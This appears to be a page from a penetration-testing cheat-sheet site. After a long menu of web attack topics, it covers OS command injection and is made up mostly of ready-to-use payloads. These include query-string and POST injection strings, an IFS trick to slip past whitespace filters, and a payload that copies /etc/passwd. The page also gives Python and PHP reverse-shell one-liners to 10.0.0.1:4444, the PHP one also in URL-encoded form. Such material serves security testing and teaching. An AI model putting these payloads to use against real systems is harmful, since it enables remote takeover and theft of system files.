Exploits related to Web

Method

HTTP Rate Limit Bypass

Virtual Hosts (VHOSTS) Enumeration

WAF (Web Application Firewall) Detection

Web Basic Pentesting

Web Content Discovery

Web Login Bypass

Web Registration Attack

Web Server Security Misconfiguration

Security Risk

Blind XXE

Broken Access Control

Business Logic Attack

CORS (Cross-Origin Resource Sharing) Attack

CRLF (Carriage Return Line Feed) Injection

CSRF (Cross-Site Request Forgery)

Client-Side JavaScript Validation Bypass

DOM Cloberring

Directory (Path) Traversal

File Inclusion (LFI/RFI)

File Upload Attack

File Upload Attack on Exiftool

File Upload Attack on ImageMagick

HTTP Request Smuggling

Host Header Attack

IDOR (Insecure Direct Object References) Attack

Insecure Deserialization

JSON.NET Deserialization

LaTeX Injection

NoSQL Injection

Node.js Deserialization Attack

OAuth Attack

OS Command Injection

Open Redirect

PHP Filters Chain

PHP Object Injection

Prototype Pollution in Client-Side

Prototype Pollution in Server-Side

Redis SSRF

SQL Injection

SQL Injection Cheat Sheet

SQL Injection with Sqlmap

SSRF (Server-Side Request Forgery)

SSTI (Server-Side Template Injection)

Web Cache Poisoning

Web Race Condition Attack

XSS (Cross-Site Scripting)

XSS with Dynamic PDF

XST (Cross-Site Tracing)

XXE (XML External Entity)

wkhtmltopdf SSRF

Cookie

Cookie Hijacking

Session Fixation

CMS

Bolt CMS Pentesting

CMS (Content Management System) Pentesting

Cockpit CMS Pentesting

Concrete CMS Pentesting

FUEL CMS Pentesting

Joomla CMS Pentesting

Mara CMS Pentesting

Subrion CMS Pentesting

TYPO3 Pentesting

WordPress Pentesting

Framework

AJP (Apache JServ Protocol) Pentesting

Angular Pentesting

Apache Struts Pentesting

Django Pentesting

Flask Jinja2 Pentesting

Python Pickle RCE

Ruby on Rails Pentesting

Spring Cloud Function RCE

Spring Pentesting

Tornado Pentesting

Werkzeug Pentesting

Template Engine

JsRender Template Injection

Pug Pentesting

API

API Pentesting

GraphQL Pentesting

Cloud

AWS (Amazon Web Services) Pentesting

Spring Cloud Function RCE

Microsoft

Microsoft Exchange Server Pentesting

Tool

Add Custom HTTP Headers in Burp Suite

Automate Sequence Requests with Burp Intruder

File Upload Attack on Exiftool

How to Use OWASP ZAP

Integrate Burp Request and SQLmap

SOCKS Proxy in Burp Suite

Turbo Intruder in Burp Suite

Others

Apache ActiveMQ Pentesting

Apache Tomcat Pentesting

Apache Zeppelin Pentesting

Atlassian Confluence Pentesting

Bookmarklet Attack

Broken Link Hijacking

Browser in the Browser (BITB) Attack

CGI Pentesting

Cacti Pentesting

ClipBucket Pentesting

Code Deobfuscation

Codiad Pentesting

Dompdf RCE

Dump Git Repository from Website

Extract Web Browser Passwords

GhostScript Pentesting

Grafana Pentesting

HTML Smuggling

HashiCorp Consul Pentesting

Icinga Web Pentesting

JBOSS Pentesting

JWT (Json Web Token) Pentesting

Java RMI Pentesting

Jenkins Pentesting

LimeSurvey Pentesting

Log4j Pentesting

OOB (Out of Band) Attack

OpenCATS Pentesting

PHP Srand Time Abusing

PHP hash_hmac Bypass

Restaurant Management System (RMS) Pentesting

TeamCity Pentesting

Tiny File Manager Pentesting

Web Browser Settings for Pentesting

Web PHP Pentesting

WebAnno Pentesting

WebDAV Pentesting

WebSocket Pentesting

Webmin Pentesting

OS Command Injection

Last modified: 2023-09-14

Remote Code Execution Reverse Shell Web

Basic Payloads

If the payload includes whitespaces (' '), we need to change it to '+' or URL encoding ('%20').

/api/cmd/whoami
/command/whoami

/?cmd=whoami
/?cmd=;id

/?cmd=ls
/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home

/?cmd=`ping -c 1 10.0.0.1`

/?file=example.txt; echo $(ls -al /)
/?file=example.txt; echo $(ls -al /) |

<!-- PHP query string -->
/?q=;system($_GET[cmd])&cmd=whoami
/?q=${system($_GET[cmd])}&cmd=whoami

/?productId=1&stockId=1|whoami
/?productId=1&stockId=1|id

<!-- Windows -->
/?file=example.txt | systeminfo #
/?file=example.txt ; systeminfo #
/?file=example.txt') ; systeminfo #

Bypass Whitespace Filter

Reference: https://www.ctfnote.com/web/os-command-injection/whitespace-bypass

If the website filters whitespaces and we cannot inject OS command including spaces e.g. 'sleep 5', we can insert Internal Field Separator (IFS) as whitespace.

$IFS$9

Payload Examples:

<!-- ping -c 5 10.0.0.1 -->
/?cmd=ping$IFS$9-c$IFS$9510.0.0.1

Ping

Try pinging to our local machine for checking if our command injection achieves.
To confirm the result, start tcpdump in our local machine.

# -i: Interface e.g. eth0, tun0
sudo tcpdump -i eth0 icmp

Then execute ping command in POST request.

Below are examples for POST data.

file=example.jpg&filetype=png;ping+-c+1+10.0.0.1

Reverse Shell

file=example.jpg&filetype=png;export RHOST="10.0.0.1";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Use "ping" command to check if the website will be loaded with time delay.

name=michael&email=michael@example.com||ping+-c+10+127.0.0.1||&message=hello
email=test@test.com;ping+-c+15+127.0.0.1+#&message=hello

If we find the command can be executed, we can execute the other commands as below.

email=test@test.com;cp+/etc/passwd+./+#&message=hello

JSON Injection

{ "username": "\"; pwd \"" }
{"email": "\";ping -c 1 10.0.0.1\""}

{"name":"<script>alert(1)</script>", "email":"victim@vulnerable.com"}

{"name": "admin", "content": "{{template: ./admin.php}}"}

PHP Injection

id=$(php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");')

# URL encode
id=1$(php%20-r%20'$sock=fsockopen(%2210.0.0.1%22,4444);exec(%22/bin/sh%20-i%20%3C&3%20%3E&3%202%3E&3%22);')
id=1$(php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27)
id=1`php%20-r%20%27%24sock%3Dfsockopen%28%2210.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27`

Tools by Muhammd

Automatic PenTest Scripts

Auto reconnaissance CLI.

PenTest Tools